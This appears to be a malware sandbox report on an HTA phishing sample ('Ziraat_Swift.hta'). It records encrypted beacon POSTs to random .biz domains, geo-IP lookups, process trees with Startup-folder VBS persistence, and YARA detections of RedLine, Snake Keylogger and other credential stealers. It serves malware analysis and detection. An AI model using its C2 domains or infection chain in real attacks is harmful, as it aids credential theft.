Dec 2, 2024 07:57:55.805135965 CET | 346 | OUT | POST /laps HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:57:55.805166006 CET | 778 | OUT | Data Raw: 47 49 40 d9 45 4e 7a 8e fe 02 00 00 2c 60 c2 bf f4 db fa 9e 7e c0 9f 7b a4 72 9d 82 c6 2c ed 6f ee 71 95 99 81 48 90 d4 aa 47 74 46 62 73 97 80 e5 7c a1 e6 0e a8 eb d3 0a 2e 6c 96 55 9b db f5 68 39 73 be 6d 07 cc 30 a9 73 64 7a e6 00 bf 4c 56 31
Data Ascii: GI@ENz,`~{r,oqHGtFbs|.lUh9sm0sdzLV1K=+_S.<]"u]f%F[{E'D:`I,f2~\-)\][|2"na(VE"]h:FE%ed2b\tjk0wRa,X
Dec 2, 2024 07:57:57.925995111 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Dec 2024 06:57:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c265428cf6f05debdad4fdd4af65cd27|8.46.123.228|1733122677|1733122677|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49887 | 44.221.84.105 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:57:58.625430107 CET | 348 | OUT | POST /bkq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:57:58.625452995 CET | 778 | OUT | Data Raw: 72 37 5f 2e dc b5 ef 9f fe 02 00 00 59 dd cc cb 53 56 52 68 b2 dc c2 57 a2 b3 a3 76 9d 92 f6 da b9 3e a2 f2 a6 33 a2 70 2e c5 10 ca 77 01 a1 30 c9 0a 21 c3 42 84 53 97 50 fa 9b 6f 49 fc ee 43 7c 41 7d 41 68 75 47 79 d2 f5 3b 60 5a 51 88 ce cf cb
Data Ascii: r7_.YSVRhWv>3p.w0!BSPoIC|A}AhuGy;`ZQc^c+p\^ \ofe5&+eQ*% #hh5sUY4<,W"^cdLZ2!Yo,FB10n@/;0)2>?ym
Dec 2, 2024 07:57:59.722337008 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Dec 2024 06:57:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=444c0e4ea70eb8017432d411eb0edae2|8.46.123.228|1733122679|1733122679|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49893 | 18.141.10.107 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:58:00.640574932 CET | 345 | OUT | POST /kf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:58:00.640599966 CET | 778 | OUT | Data Raw: 71 55 4e a6 47 18 75 1e fe 02 00 00 ee f8 51 2e 72 61 bb dd 3c 87 8b 27 76 49 54 11 e5 88 4e ba c1 d0 c1 78 8f 39 e6 15 99 6c ca ad fb 30 dd aa 9e 6b 41 e6 fa 80 5f 39 46 32 ae 01 fd 7b 26 03 d4 83 67 6c 81 7b 7e 3d 9f d3 46 ab c3 ab 89 e0 5a 8b
Data Ascii: qUNGuQ.ra<'vITNx9l0kA_9F2{&gl{~=FZq&[*Q^2f}K Eeyc>SIT%m*F{is_}F^Z'Wm?^Z91aalZ7zK<UN3q,a^CwcyxNu
Dec 2, 2024 07:58:02.649509907 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Dec 2024 06:58:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=50e66b7671235bd6e77d7017d3fbef73|8.46.123.228|1733122682|1733122682|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49899 | 172.234.222.138 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:58:03.477749109 CET | 342 | OUT | POST /a HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:58:03.477765083 CET | 778 | OUT | Data Raw: 04 d0 73 e5 31 57 f9 47 fe 02 00 00 da b2 fc a2 f6 54 0e 91 0c 6d 20 85 ef 48 4d 86 30 fb 2d 3f ff 99 d3 2a 1d 7e 87 64 5e 59 48 02 87 c0 a8 88 df 47 62 86 60 82 9e a8 51 a6 e9 be 17 8f b8 64 51 c6 64 e8 16 c6 6e 52 dc 0b 74 b4 ae 75 83 70 38 b0
Data Ascii: s1WGTm HM0-?*~d^YHGb`QdQdnRtup8;g[(vX:7P'mG&b<9&9:l]#mh8^v\v>FR;YcDU85.MW\ AJ~q-ob*;'>H+'
Dec 2, 2024 07:58:04.603831053 CET | 461 | IN | HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Mon, 02 Dec 2024 06:58:04 GMT
Content-Type: text/html
Content-Length: 142
Connection: keep-alive
Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
Location: http://ww99.fwiwk.biz/a
Cache-Control: no-store, max-age=0
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49902 | 72.52.179.174 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:58:05.045425892 CET | 325 | OUT | GET /a HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Host: ww99.fwiwk.biz
Dec 2, 2024 07:58:06.259377003 CET | 272 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                Date: Mon, 02 Dec 2024 06:58:06 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 0
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: http://ww7.fwiwk.biz/a?usid=26&utid=9204737652
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Access-Control-Allow-Origin: *


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 104.21.67.152 | 443 | 7496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-02 06:56:16 UTC | 85 | OUT | GET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
2024-12-02 06:56:17 UTC | 869 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FQwYiEjXjN83xKRiL%2FU5KOjstZh1vTVfH08w2It9%2BF2hWQ%2FZF7HaQO%2Bq1Vjhk8hv8bTcne4BHInJGT6QXcUWRZ72b3qSEPToVehCgVTYKnGxgdCfbtJwopHfKfx%2B07aAWmi0ZwIW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8eb96a8b2af8f3bb-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1644&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1776155&cwnd=32&unsent_bytes=0&cid=400d57f9ee2181f3&ts=828&x=0"
2024-12-02 06:56:17 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49752 | 104.21.67.152 | 443 | 8008 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-02 06:56:29 UTC | 85 | OUT | GET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                                Connection: Keep-Alive
2024-12-02 06:56:29 UTC | 876 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:29 GMT
                                                                                                                                                Content-Type: text/xml
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 12
                                                                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=czBGGItZsKIZizKxQRLn9CY7mLf%2F1OGqENVAWd4WjGXPhIxERBzsHmisBCftOrAMmPtduk0Bk0MGfSma6bEFYQ8iWIliGBZckZJ%2BPYkOAy7OJTFTdPeG%2BvWYseSwjB%2B%2F0AWU9d0w"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8eb96ad69b08335a-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1982&rtt_var=763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1416100&cwnd=232&unsent_bytes=0&cid=fa7755599b8346fb&ts=458&x=0"
2024-12-02 06:56:29 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Target ID:0
                                                                                                                                                Start time:01:55:59
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:mshta.exe "C:\Users\user\Desktop\Ziraat_Swift.hta"
                                                                                                                                                Imagebase:0xf00000
                                                                                                                                                File size:13'312 bytes
                                                                                                                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:01:56:04
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'696'256 bytes
                                                                                                                                                MD5 hash:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:01:56:05
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'290'240 bytes
                                                                                                                                                MD5 hash:C8BF45BDD9AC7A2C04E7836B9AC9D15E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:01:56:06
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\alg.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'225'728 bytes
                                                                                                                                                MD5 hash:70BB2AC3B1D5DF22D2B74DA852AD13AA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:01:56:06
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'696'256 bytes
                                                                                                                                                MD5 hash:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.1762544925.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:01:56:07
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                                Imagebase:0x4d0000
                                                                                                                                                File size:45'984 bytes
                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2946618374.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:01:56:08
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:2'354'176 bytes
                                                                                                                                                MD5 hash:325FCE66CB0133E663D042F034BDE5AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:01:56:09
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'356'800 bytes
                                                                                                                                                MD5 hash:FED16854B8EA309A65BF6450ECACF0D0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:01:56:19
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs"
                                                                                                                                                Imagebase:0x7ff7dc3c0000
                                                                                                                                                File size:170'496 bytes
                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:01:56:20
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'696'256 bytes
                                                                                                                                                MD5 hash:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.1905647858.0000000004080000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:01:56:22
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
                                                                                                                                                Imagebase:0x300000
                                                                                                                                                File size:45'984 bytes
                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:01:56:22
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'696'256 bytes
                                                                                                                                                MD5 hash:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.1924522530.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:01:56:23
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                File size:45'984 bytes
                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2945957784.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
